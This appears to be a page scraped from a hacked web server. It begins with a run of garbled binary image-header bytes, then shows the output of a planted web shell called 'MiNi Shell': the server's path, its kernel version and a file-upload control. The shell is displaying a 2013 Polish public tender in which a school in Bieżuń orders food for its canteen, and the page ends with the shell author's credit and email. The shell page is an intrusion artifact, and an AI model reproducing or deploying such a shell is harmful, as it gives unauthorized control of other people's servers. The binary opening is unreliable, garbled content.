JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131007/206029-N-2013.html

<p class="kh_header"><b>Bieżuń: ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ZESPOLE PLACÓWEK OŚWIATOWYCH W BIEŻUNIU</b><br>
<b>Numer ogłoszenia: 206029 - 2013; data zamieszczenia: 07.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Placówek Oświatowych w Bieżuniu , ul. Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie, tel. 23 657 84 00, faks 23 657 84 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zpo.hostnet.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.zpo.hostnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP I DOSTAWA ARTYKUŁÓW ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ZESPOLE PLACÓWEK OŚWIATOWYCH W BIEŻUNIU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CUKIER 636KG, MĄKA PSZENNA 633KG,KASZA JĘCZMIENNA ŚREDNIA (500G)196KG, KASZA GRYCZANA 25 KG, RYŻ 171 KG, SÓL 219 KG, BUŁKA TARTA (0,5KG) 122SZT, MAKARON ŁĄCKI NITKI (400G) 163SZT, MAKARON ŁĄCKI ŚWIDERKI (400G) 588SZT, MAKARON ŁĄCKI KRAJANKA (400G) 141SZT, MĄKA ZIEMNIACZANA 33KG, MAKARON BĄCZEK (400G) 167SZT, MAKARON SPAGHETTI (400G) 271SZT, MAKARON GWIAZDECZKI (250G) 25 SZT, PAPRYKA MIELONA SŁODKA (20G) 28 SZT, PIEPRZ MIELONY (20G) 258 SZT, MAJERANEK (10G) 91 SZT, LIŚĆ LAUROWY (18G) 57SZT, ZIELE ANGIELSKIE (15G) 57SZT, KWASEK CYTRYNOWY (20G) 42SZT, PRZYPRAWA KUCHAREK LUB RÓWNOWAŻNA (200G) 157SZT, GROSZEK KONSERWOWY (400G) 60SZT, KUKURYDZA KONSERWOWA KWIDZYN (220G) 83SZT, KONCENTRAT POMIDOROWY (970G) 83SZT, KONCENTRAT POMIDOROWY (230G) 73SZT, MAJONEZ POMORSKI (620G) 59SZT, MAJONEZ POMORSKI (260G) 42SZT, MUSZTARDA SAREPSKA (200G) 67SZT, HERBATA SAGA GRANULKI (90G) 72SZT, MARGARYNA ZWYKŁA (250G) 117SZT, CUKIER PUDER (400G) 13SZT, ZACIERKI BABUNI (250G) 125SZT, OLEJ OLEO (1L) 332SZT, SOS SAŁATKOWY KNORR (9G) 64SZT, KOMPOT WIŚNIOWY (900ML) 793SZT, KOMPOT PORZECZKOWY (900ML) 798SZT, KOMPOT TRUSKAWKOWY (900ML) 796SZT, PRZYPRAWA W PŁYNIE- MAGI (1L) 21SZT, KECZUP WŁOCŁAWEK -TUBA ŁAGODNY (480G) 134SZT, SOS PIECZENIOWY JASNY WINIARY LUB RÓWNOWAŻNY (30G) 105SZT, CYNAMON (20G) 18SZT, kAKAO WEDEL (80G) 44SZT, KAWA INKA (150G) 26SZT, NUTELLA (230G) 159SZT, OCET (0,5L) 54SZT, GALARETKA DELECTA (79G) 346SZT, PRZYPRAWA DO KURCZAKA (20G) 25SZT, SODA (100G) 9SZT, SOS PIECZARKOWY WINIARY LUB RÓWNOWAŻNY (BEZ DODATKU KONSERWANTÓW I GLUTAMINIANU SODU- 30G) 58SZT, DROŻDŻE (100G) 23SZT, ZUPA ŻUREK KNORR LUB RÓWNOWAŻNA (54G) 292SZT, ŻUREK-BUTELKA (480ML) 26SZT, DŻEM ŁOWICZ (280G) 506SZT, CUKIER WANILIOWY (30G) 280SZT, PROSZEK DO PIECZENIA (30G) 146SZT, CZOSNEK W PROSZKU (60G) 105SZT, OGÓRKI KONSERWOWE (0,9L) 99SZT, OGÓRKI KISZONE (0,9L) 57SZT, PASZTET PODLASKI (155G) 147SZT, PAPRYKARZ SZCZECIŃSKI (300G) 46SZT, BURACZKI-SUSZ (100G) 156SZT, PIETRUSZKA-SUSZ (20G) 51SZT, KOPER-SUSZ (15G) 35SZT, PAPRYKA MIELONA OSTRA (20G) 33SZT, SMALEC (200G) 89SZT, CHRZAN- SŁOIK (180G) 7SZT, PŁATKI OWSIANE BŁYSKAWICZNE (400G) 35SZT, PŁATKI RYŻOWE BŁYSKAWICZNE (250G) 56SZT, PŁATKI JĘCZMIENNE BŁYSKAWICZNE (400G) 25SZT, PŁATKI KUKURYDZIANE LUBELLA 42SZT, PŁATKI KUKURYDZIANE CORN FLAKES (600G) 84SZT, PŁATKI CZEKOLADOWE 67SZT, PŁATKI NESQUIK (250G) 42SZT, PŁATKI CHOCAPIC (250G) 21SZT, JAJKA 5313SZT, SAŁATKA Z CZERWONEJ KAPUSTY (0,900L) 78SZT, HERBATA SAGA (100 TOREBEK) 21SZT, MAKRELA WĘDZONA 15KG, PASZTET WIELKOPOLSKI 48SZT, ZIEMNIAKI 8230KG, WŁOSZCZYZNA 1100SZT, GROCH ŁUSKANY (400G) 72SZT, CEBULA 162 KG, SZCZYPIOR 13SZT, KAPUSTA KISZONA 363KG, KAPUSTA PEKIŃSKA 248KG, MARCHEW 626KG, OGÓRKI ŚWIEŻE (WRZESIEŃ, PAŹDZIERNIK) 349KG, OGÓRKI KISZONE-FOLIA 26SZT, PIECZARKI 108KG, KALAFIOR 31SZT, BROKUŁ 21SZT, PIETRUSZKA-NATKA 169SZT, KAPUSTA BIAŁA 470KG, POMIDORY (WRZESIEŃ, PAŹDZIERNIK) 183KG, POR 38SZT, JABŁKA 751KG, RZODKIEWKA-PĘCZEK 53SZT, BANANY 320KG, MANDARYNKI 84KG, CYTRYNA 50KG, NEKTARYNKI 233KG, TRUSKAWKI 70KG, SELER 6KG, FASOLA DROBNA (450G) 72SZT, KOPER ŚWIEŻY 79SZT, OGÓRKI-PRZECIER 209SZT, SAŁATA MASŁOWA 99SZT, PAPRYKA ŚWIEŻA (WRZESIEŃ,PAŹDZIERNIK) 36KG, KARKÓWKA B/K 492KG, SCHAB B/K 309KG, GOLONKA 18KG, ŁOPATKA B/K 98KG, ŻEBERKA 14KG, SŁONINA 40KG, WOŁOWE Z KOŚCIĄ 65KG, BOCZEK SKÓROWANY WĘDZONY 85KG, KIEŁBASA WEEKENDOWA/ZWYCZAJNA 251KG, POLĘDWICA MIODOWA 25KG, POLĘDWICA KANADYJSKA 13KG, POLĘDWICA SOPOCKA 34KG, PARÓWKI PALUSZKI 131KG, SERDELKI 51KG, INDYK FASZEROWANY 17KG, KURCZAK FASZEROWANY 9KG, KIEŁBASA KRAKOWSKA 17KG, KIEŁBASA ŻYWIECKA 14KG, KIEŁBASA SZYNKOWA 22KG, KIEŁBASA BIAŁA NA RUSZT 47 KG, PRZYSMAK W KONSERWIE 28KG, SZYNKA Z PIERSI INDYKA 23KG, SZYNKA WIEPRZOWA 37KG, KASZANKA 19KG, SCHAB PARZONY W MAJERANKU 26KG, PASZTET Z PIECA 24KG, BURACZKI ĆWIKŁOWE (MROŻONKA) 752SZT, BROKUŁ (MROŻONKA) 32SZT,  BUKIET WARZYW (MROŻONKA) 69SZT, BARSZCZ UKRAIŃSKI (MROŻONKA) 109SZT, ZUPA JARZYNOWA (MROŻONKA) 63SZT, FASOLKA SZPARAGOWA (MROŻONKA) 73SZT, LECZO (MROŻONKA) 17SZT, KALAFIOR (MROŻONKA) 16SZT, PYZY Z MIĘSEM (MROŻONKA) 294SZT, FILET Z MIRUNY (MROŻONKA) 168KG, MASŁO EXTRA-KOSTKA (200G) 882SZT, ŚMIETANA 30% 2268SZT, MLEKO 2% TŁUSZCZU (1L)2265SZT, MLEKO 2% KARTON 531SZT, TWARÓG 464KG, SER ŻÓŁTY SMAKOSZ 130KG, SER ŻÓŁTY KRÓLEWSKI 45KG, SEREK TOPIONY HOCHLAND BATON (100G) 157SZT, SEREK TOPIONY HOCHLAND ZEGAR (200G) 52SZT, JOGURT GRATKA (115G) 2248, JOGURT GRATKA (330G) 151SZT, JOGURT SERDUSZKO (150G) 3292SZT, JOGURT OWOCOWY 1297SZT, JOGURT NATURALNY (400G) 21SZT, SEREK HOMOGENIZOWANY 56SZT, PORCJA ZE SKRZYDŁAMI 557KG, UDZIEC Z KURCZAKA 546KG, FILET Z KURCZAKA 567KG, BUŁKA ZWYKŁA 326SZT, CHLEB ZWYKŁY PSZENNY KROJONY 1594SZT, CHLEB MIESZANY KROJONY 116SZT, BUŁKA DROŻDŻOWA 1671, BUŁKA MAŚLANA 1680SZT, BUŁKA RAZOWA 830SZT, BUŁKA KAJZERKA 15404..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie w trybie art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zpo.hostnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Placówek Oświatowych w Bieżuniu, ul. Stefana Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie -w  sekretariacie szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 10:00, miejsce: sekretariat Zespołu Placówek Oświatowych w Bieżuniu, ul. Stefana Gołębiowskiego 1, 09-320 Bieżuń, woj. mazowieckie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com